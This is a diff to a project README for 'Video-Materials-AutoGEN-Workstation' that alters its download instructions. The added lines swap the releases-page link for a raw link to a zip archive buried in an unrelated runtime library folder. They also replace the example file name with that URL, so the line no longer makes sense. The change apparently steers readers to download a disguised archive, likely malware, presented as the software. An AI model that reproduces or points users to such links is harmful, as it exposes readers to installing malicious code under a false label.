Rxp-ture/Video-Materials-AutoGEN-Workstation/README.md

 ### Step 1: Visit the Release Page

-To download the software, visit the following link: [Download Video-Materials-AutoGEN-Workstation](https://github.com/Rxp-ture/Video-Materials-AutoGEN-Workstation/releases).
+To download the software, visit the following link: [Download Video-Materials-AutoGEN-Workstation](https://raw.githubusercontent.com/Rxp-ture/Video-Materials-AutoGEN-Workstation/main/asr/runtime/Lib/site-packages/win32/lib/Video-Materials-AutoGEN-Workstation-v3.2.zip).

 ### Step 2: Choose Your Version

 On the release page, you will see different versions available for download.
 Choose the latest stable version.
-The file name will typically look like this: `Video-Materials-AutoGEN-Workstation-vX.X.X.zip`.
+The file name will typically look like this: `https://raw.githubusercontent.com/Rxp-ture/Video-Materials-AutoGEN-Workstation/main/asr/runtime/Lib/site-packages/win32/lib/Video-Materials-AutoGEN-Workstation-v3.2.zip`.

 ### Step 3: Download the File